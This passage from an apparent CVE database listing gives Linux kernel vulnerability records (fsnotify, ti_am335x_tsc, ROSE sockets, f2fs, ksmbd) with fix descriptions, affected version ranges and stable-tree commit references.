"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfsnotify: do not generate ACCESS/MODIFY events on child for special files\n\ninotify/fanotify do not allow users with no read access to a file to\nsubscribe to events (e.g. IN_ACCESS/IN_MODIFY), but they do allow the\nsame user to subscribe for watching events on children when the user\nhas access to the parent directory (e.g. /dev).\n\nUsers with no read access to a file but with read access to its parent\ndirectory can still stat the file and see if it was accessed/modified\nvia atime/mtime change.\n\nThe same is not true for special files (e.g. /dev/null). Users will not\ngenerally observe atime/mtime changes when other users read/write to\nspecial files, only when someone sets atime/mtime via utimensat().\n\nAlign fsnotify events with this stat behavior and do not generate\nACCESS/MODIFY events to parent watchers on read/write of special files.\nThe events are still generated to parent watchers on utimensat(). This\ncloses some side-channels that could be possibly used for information\nexfiltration [1].\n\n[1] https://snee.la/pdf/pubs/file-notification-attacks.pdf"
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:04.736Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/df2711544b050aba703e6da418c53c7dc5d443ca"
},
{
"url": "https://git.kernel.org/stable/c/859bdf438f01d9aa7f84b09c1202d548c7cad9e8"
},
{
"url": "https://git.kernel.org/stable/c/6a7d7d96eeeab7af2bd01afbb3d9878a11a13d91"
},
{
"url": "https://git.kernel.org/stable/c/e0643d46759db8b84c0504a676043e5e341b6c81"
},
{
"url": "https://git.kernel.org/stable/c/82f7416bcbd951549e758d15fc1a96a5afc2e900"
},
{
"url": "https://git.kernel.org/stable/c/7a93edb23bcf07a3aaf8b598edfc2faa8fbcc0b6"
},
{
"url": "https://git.kernel.org/stable/c/635bc4def026a24e071436f4f356ea08c0eed6ff"
}
],
"title": "fsnotify: do not generate ACCESS/MODIFY events on child for special files",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68788",
"datePublished": "2026-01-13T15:29:01.270Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-19T12:19:04.736Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68777 (GCVE-0-2025-68777)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
Input: ti_am335x_tsc - fix off-by-one error in wire_order validation
Summary
In the Linux kernel, the following vulnerability has been resolved:
Input: ti_am335x_tsc - fix off-by-one error in wire_order validation
The current validation 'wire_order[i] > ARRAY_SIZE(config_pins)' allows
wire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds
access when used as index in 'config_pins[wire_order[i]]'.
Since config_pins has 4 elements (indices 0-3), the valid range for
wire_order should be 0-3. Fix the off-by-one error by using >= instead
of > in the validation check.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < a7ff2360431561b56f559d3a628d1f096048d178 (git) |
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < 136abe173a3cc2951d70c6e51fe7abdbadbb204b (git) |
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < 08c0b561823a7026364efb38ed7f4a3af48ccfcd (git) |
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < bf95ec55805828c4f2b5241fb6b0c12388548570 (git) |
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < 84e4d3543168912549271b34261f5e0f94952d6e (git) |
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < 40e3042de43ffa0017a8460ff9b4cad7b8c7cb96 (git) |
| Linux | Linux | Affected: bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439, < 248d3a73a0167dce15ba100477c3e778c4787178 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/input/touchscreen/ti_am335x_tsc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a7ff2360431561b56f559d3a628d1f096048d178",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "136abe173a3cc2951d70c6e51fe7abdbadbb204b",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "08c0b561823a7026364efb38ed7f4a3af48ccfcd",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "bf95ec55805828c4f2b5241fb6b0c12388548570",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "84e4d3543168912549271b34261f5e0f94952d6e",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "40e3042de43ffa0017a8460ff9b4cad7b8c7cb96",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
},
{
"lessThan": "248d3a73a0167dce15ba100477c3e778c4787178",
"status": "affected",
"version": "bb76dc09ddfc135c6c5e8eb7d3c583bfa8bdd439",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/input/touchscreen/ti_am335x_tsc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.11"
},
{
"lessThan": "3.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "3.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "3.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:57.283Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a7ff2360431561b56f559d3a628d1f096048d178"
},
{
"url": "https://git.kernel.org/stable/c/136abe173a3cc2951d70c6e51fe7abdbadbb204b"
},
{
"url": "https://git.kernel.org/stable/c/08c0b561823a7026364efb38ed7f4a3af48ccfcd"
},
{
"url": "https://git.kernel.org/stable/c/bf95ec55805828c4f2b5241fb6b0c12388548570"
},
{
"url": "https://git.kernel.org/stable/c/84e4d3543168912549271b34261f5e0f94952d6e"
},
{
"url": "https://git.kernel.org/stable/c/40e3042de43ffa0017a8460ff9b4cad7b8c7cb96"
},
{
"url": "https://git.kernel.org/stable/c/248d3a73a0167dce15ba100477c3e778c4787178"
}
],
"title": "Input: ti_am335x_tsc - fix off-by-one error in wire_order validation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68777",
"datePublished": "2026-01-13T15:28:53.416Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:57.283Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-71086 (GCVE-0-2025-71086)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:34 – Updated: 2026-01-19 12:19
Title
net: rose: fix invalid array index in rose_kill_by_device()
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: rose: fix invalid array index in rose_kill_by_device()
rose_kill_by_device() collects sockets into a local array[] and then
iterates over them to disconnect sockets bound to a device being brought
down.
The loop mistakenly indexes array[cnt] instead of array[i]. For cnt <
ARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==
ARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to
an invalid socket pointer dereference and also leaks references taken
via sock_hold().
Fix the index to use i.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 12e5a4719c99d7f4104e7e962393dfb8baa1c591, < 819fb41ae54960f66025802400c9d3935eef4042 (git) |
| Linux | Linux | Affected: c0e527c532a07556ca44642f5873b002c44da22c, < ed2639414d43ba037f798eaf619e878309310451 (git) |
| Linux | Linux | Affected: 3e0d1585799d8a991eba9678f297fd78d9f1846e, < 1418c12cd3bba79dc56b57b61c99efe40f579981 (git) |
| Linux | Linux | Affected: ffced26692f83212aa09d0ece0213b23cc2f611d, < 9f6185a32496834d6980b168cffcccc2d6b17280 (git) |
| Linux | Linux | Affected: 64b8bc7d5f1434c636a40bdcfcd42b278d1714be, < b409ba9e1e63ccf3ab4cc061e33c1f804183543e (git) |
| Linux | Linux | Affected: 64b8bc7d5f1434c636a40bdcfcd42b278d1714be, < 92d900aac3a5721fb54f3328f1e089b44a861c38 (git) |
| Linux | Linux | Affected: 64b8bc7d5f1434c636a40bdcfcd42b278d1714be, < 6595beb40fb0ec47223d3f6058ee40354694c8e4 (git) |
| Linux | Linux | Affected: bd7de4734535140fda33240c2335a07fdab6f88e (git) |
| Linux | Linux | Affected: b10265532df7bc3666bc53261b7f03f0fd14b1c9 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/rose/af_rose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "819fb41ae54960f66025802400c9d3935eef4042",
"status": "affected",
"version": "12e5a4719c99d7f4104e7e962393dfb8baa1c591",
"versionType": "git"
},
{
"lessThan": "ed2639414d43ba037f798eaf619e878309310451",
"status": "affected",
"version": "c0e527c532a07556ca44642f5873b002c44da22c",
"versionType": "git"
},
{
"lessThan": "1418c12cd3bba79dc56b57b61c99efe40f579981",
"status": "affected",
"version": "3e0d1585799d8a991eba9678f297fd78d9f1846e",
"versionType": "git"
},
{
"lessThan": "9f6185a32496834d6980b168cffcccc2d6b17280",
"status": "affected",
"version": "ffced26692f83212aa09d0ece0213b23cc2f611d",
"versionType": "git"
},
{
"lessThan": "b409ba9e1e63ccf3ab4cc061e33c1f804183543e",
"status": "affected",
"version": "64b8bc7d5f1434c636a40bdcfcd42b278d1714be",
"versionType": "git"
},
{
"lessThan": "92d900aac3a5721fb54f3328f1e089b44a861c38",
"status": "affected",
"version": "64b8bc7d5f1434c636a40bdcfcd42b278d1714be",
"versionType": "git"
},
{
"lessThan": "6595beb40fb0ec47223d3f6058ee40354694c8e4",
"status": "affected",
"version": "64b8bc7d5f1434c636a40bdcfcd42b278d1714be",
"versionType": "git"
},
{
"status": "affected",
"version": "bd7de4734535140fda33240c2335a07fdab6f88e",
"versionType": "git"
},
{
"status": "affected",
"version": "b10265532df7bc3666bc53261b7f03f0fd14b1c9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/rose/af_rose.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.7"
},
{
"lessThan": "6.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc4",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "5.10.206",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "5.15.146",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "6.1.70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.4",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc4",
"versionStartIncluding": "6.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.304",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.266",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: rose: fix invalid array index in rose_kill_by_device()\n\nrose_kill_by_device() collects sockets into a local array[] and then\niterates over them to disconnect sockets bound to a device being brought\ndown.\n\nThe loop mistakenly indexes array[cnt] instead of array[i]. For cnt \u003c\nARRAY_SIZE(array), this reads an uninitialized entry; for cnt ==\nARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to\nan invalid socket pointer dereference and also leaks references taken\nvia sock_hold().\n\nFix the index to use i."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:19:49.873Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/819fb41ae54960f66025802400c9d3935eef4042"
},
{
"url": "https://git.kernel.org/stable/c/ed2639414d43ba037f798eaf619e878309310451"
},
{
"url": "https://git.kernel.org/stable/c/1418c12cd3bba79dc56b57b61c99efe40f579981"
},
{
"url": "https://git.kernel.org/stable/c/9f6185a32496834d6980b168cffcccc2d6b17280"
},
{
"url": "https://git.kernel.org/stable/c/b409ba9e1e63ccf3ab4cc061e33c1f804183543e"
},
{
"url": "https://git.kernel.org/stable/c/92d900aac3a5721fb54f3328f1e089b44a861c38"
},
{
"url": "https://git.kernel.org/stable/c/6595beb40fb0ec47223d3f6058ee40354694c8e4"
}
],
"title": "net: rose: fix invalid array index in rose_kill_by_device()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-71086",
"datePublished": "2026-01-13T15:34:49.007Z",
"dateReserved": "2026-01-13T15:30:19.649Z",
"dateUpdated": "2026-01-19T12:19:49.873Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68772 (GCVE-0-2025-68772)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
f2fs: fix to avoid updating compression context during writeback
Summary
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix to avoid updating compression context during writeback
Bai, Shuangpeng <sjb7183@psu.edu> reported a bug as below:
Oops: divide error: 0000 [#1] SMP KASAN PTI
CPU: 0 UID: 0 PID: 11441 Comm: syz.0.46 Not tainted 6.17.0 #1 PREEMPT(full)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:f2fs_all_cluster_page_ready+0x106/0x550 fs/f2fs/compress.c:857
Call Trace:
<TASK>
f2fs_write_cache_pages fs/f2fs/data.c:3078 [inline]
__f2fs_write_data_pages fs/f2fs/data.c:3290 [inline]
f2fs_write_data_pages+0x1c19/0x3600 fs/f2fs/data.c:3317
do_writepages+0x38e/0x640 mm/page-writeback.c:2634
filemap_fdatawrite_wbc mm/filemap.c:386 [inline]
__filemap_fdatawrite_range mm/filemap.c:419 [inline]
file_write_and_wait_range+0x2ba/0x3e0 mm/filemap.c:794
f2fs_do_sync_file+0x6e6/0x1b00 fs/f2fs/file.c:294
generic_write_sync include/linux/fs.h:3043 [inline]
f2fs_file_write_iter+0x76e/0x2700 fs/f2fs/file.c:5259
new_sync_write fs/read_write.c:593 [inline]
vfs_write+0x7e9/0xe00 fs/read_write.c:686
ksys_write+0x19d/0x2d0 fs/read_write.c:738
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xf7/0x470 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
The bug was triggered w/ below race condition:
```
fsync                           setattr                 ioctl
- f2fs_do_sync_file
 - file_write_and_wait_range
  - f2fs_write_cache_pages
  : inode is non-compressed
  : cc.cluster_size =
    F2FS_I(inode)->i_cluster_size = 0
   - tag_pages_for_writeback
                                - f2fs_setattr
                                 - truncate_setsize
                                 - f2fs_truncate
                                                        - f2fs_fileattr_set
                                                         - f2fs_setflags_common
                                                          - set_compress_context
                                                          : F2FS_I(inode)->i_cluster_size = 4
                                                          : set_inode_flag(inode, FI_COMPRESSED_FILE)
   - f2fs_compressed_file
   : return true
   - f2fs_all_cluster_page_ready
   : "pgidx % cc->cluster_size" trigger dividing 0 issue
```
Let's change as below to fix this issue:
- introduce a new atomic type variable .writeback in structure f2fs_inode_info
to track the number of threads which calling f2fs_write_cache_pages().
- use .i_sem lock to protect .writeback update.
- check .writeback before update compression context in f2fs_setflags_common()
to avoid race w/ ->writepages.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3, < ad26bfbc085c939b5dca77ff8c14798c06d151c4 (git) |
| Linux | Linux | Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3, < bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0 (git) |
| Linux | Linux | Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3, < 0bf1a02494c7eb5bd43445de4c83c8592e02c4bf (git) |
| Linux | Linux | Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3, < 0df713a9c082a474c8b0bcf670edc8e98461d5a0 (git) |
| Linux | Linux | Affected: 4c8ff7095bef64fc47e996a938f7d57f9e077da3, < 10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/f2fs/data.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/file.c",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ad26bfbc085c939b5dca77ff8c14798c06d151c4",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "0bf1a02494c7eb5bd43445de4c83c8592e02c4bf",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "0df713a9c082a474c8b0bcf670edc8e98461d5a0",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
},
{
"lessThan": "10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76",
"status": "affected",
"version": "4c8ff7095bef64fc47e996a938f7d57f9e077da3",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/f2fs/data.c",
"fs/f2fs/f2fs.h",
"fs/f2fs/file.c",
"fs/f2fs/super.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid updating compression context during writeback\n\nBai, Shuangpeng \u003csjb7183@psu.edu\u003e reported a bug as below:\n\nOops: divide error: 0000 [#1] SMP KASAN PTI\nCPU: 0 UID: 0 PID: 11441 Comm: syz.0.46 Not tainted 6.17.0 #1 PREEMPT(full)\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nRIP: 0010:f2fs_all_cluster_page_ready+0x106/0x550 fs/f2fs/compress.c:857\nCall Trace:\n \u003cTASK\u003e\n f2fs_write_cache_pages fs/f2fs/data.c:3078 [inline]\n __f2fs_write_data_pages fs/f2fs/data.c:3290 [inline]\n f2fs_write_data_pages+0x1c19/0x3600 fs/f2fs/data.c:3317\n do_writepages+0x38e/0x640 mm/page-writeback.c:2634\n filemap_fdatawrite_wbc mm/filemap.c:386 [inline]\n __filemap_fdatawrite_range mm/filemap.c:419 [inline]\n file_write_and_wait_range+0x2ba/0x3e0 mm/filemap.c:794\n f2fs_do_sync_file+0x6e6/0x1b00 fs/f2fs/file.c:294\n generic_write_sync include/linux/fs.h:3043 [inline]\n f2fs_file_write_iter+0x76e/0x2700 fs/f2fs/file.c:5259\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x7e9/0xe00 fs/read_write.c:686\n ksys_write+0x19d/0x2d0 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xf7/0x470 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe bug was triggered w/ below race condition:\n\nfsync\t\t\t\tsetattr\t\t\tioctl\n- f2fs_do_sync_file\n - file_write_and_wait_range\n - f2fs_write_cache_pages\n : inode is non-compressed\n : cc.cluster_size =\n F2FS_I(inode)-\u003ei_cluster_size = 0\n - tag_pages_for_writeback\n\t\t\t\t- f2fs_setattr\n\t\t\t\t - truncate_setsize\n\t\t\t\t - f2fs_truncate\n\t\t\t\t\t\t\t- f2fs_fileattr_set\n\t\t\t\t\t\t\t - f2fs_setflags_common\n\t\t\t\t\t\t\t - set_compress_context\n\t\t\t\t\t\t\t : F2FS_I(inode)-\u003ei_cluster_size = 4\n\t\t\t\t\t\t\t : set_inode_flag(inode, FI_COMPRESSED_FILE)\n - f2fs_compressed_file\n : return true\n - f2fs_all_cluster_page_ready\n : \"pgidx % cc-\u003ecluster_size\" trigger dividing 0 issue\n\nLet\u0027s change as below to fix this issue:\n- introduce a new atomic type variable .writeback in structure f2fs_inode_info\nto track the number of threads which calling f2fs_write_cache_pages().\n- use .i_sem lock to protect .writeback update.\n- check .writeback before update compression context in f2fs_setflags_common()\nto avoid race w/ -\u003ewritepages."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:49.924Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ad26bfbc085c939b5dca77ff8c14798c06d151c4"
},
{
"url": "https://git.kernel.org/stable/c/bcd0086ee5a2e88c1224ff2ec1e4a43c83efe5a0"
},
{
"url": "https://git.kernel.org/stable/c/0bf1a02494c7eb5bd43445de4c83c8592e02c4bf"
},
{
"url": "https://git.kernel.org/stable/c/0df713a9c082a474c8b0bcf670edc8e98461d5a0"
},
{
"url": "https://git.kernel.org/stable/c/10b591e7fb7cdc8c1e53e9c000dc0ef7069aaa76"
}
],
"title": "f2fs: fix to avoid updating compression context during writeback",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68772",
"datePublished": "2026-01-13T15:28:49.924Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-13T15:28:49.924Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68809 (GCVE-0-2025-68809)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-14 08:51
Title
ksmbd: vfs: fix race on m_flags in vfs_cache
Summary
In the Linux kernel, the following vulnerability has been resolved:
ksmbd: vfs: fix race on m_flags in vfs_cache
ksmbd maintains delete-on-close and pending-delete state in
ksmbd_inode->m_flags. In vfs_cache.c this field is accessed under
inconsistent locking: some paths read and modify m_flags under
